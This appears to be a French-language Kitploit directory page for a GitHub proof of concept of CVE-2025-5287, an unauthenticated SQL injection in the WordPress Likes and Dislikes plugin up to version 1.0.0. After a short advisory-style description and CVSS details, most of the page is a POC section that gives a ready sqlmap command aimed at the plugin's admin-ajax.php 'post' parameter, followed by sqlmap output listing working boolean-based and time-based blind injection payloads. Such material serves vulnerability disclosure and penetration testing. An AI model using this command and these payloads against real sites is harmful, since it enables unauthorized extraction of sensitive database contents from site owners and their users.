Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5287 — Likes and Dislikes Plugin <= 1.0.0 - Injection SQL non authentifiée | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2025-5287
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubrandomrobbiebf/cve-2025-5287

CVE-2025-5287

Likes and Dislikes Plugin <= 1.0.0 - Injection SQL non authentifiée

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5287

Plugin Likes and Dislikes <= 1.0.0 - Injection SQL non authentifiée

Description

Le plugin Likes and Dislikes pour WordPress est vulnérable à une injection SQL via le paramètre « post » dans toutes les versions jusqu'à la version 1.0.0 incluse, en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, qui peuvent être utilisées pour extraire des informations sensibles de la base de données.

Détails

  • Type : plugin
  • Slug : inprosysmedia-likes-dislikes-post
  • Version affectée : 1.0.0
  • Score CVSS : 7.5
  • Gravité CVSS : Élevée
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE : CVE-2025-5287
  • Statut : Fermé

POC

root@kitploit:~
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
root@kitploit:~
sqlmap a identifié le ou les points d'injection suivants avec un total de 372 requêtes HTTP :
---
Paramètre : post (POST)
    Type : aveugle basé sur un booléen
    Titre : AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload : action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike

    Type : aveugle basé sur le temps
    Titre : MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload : action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---
Télécharger l’outil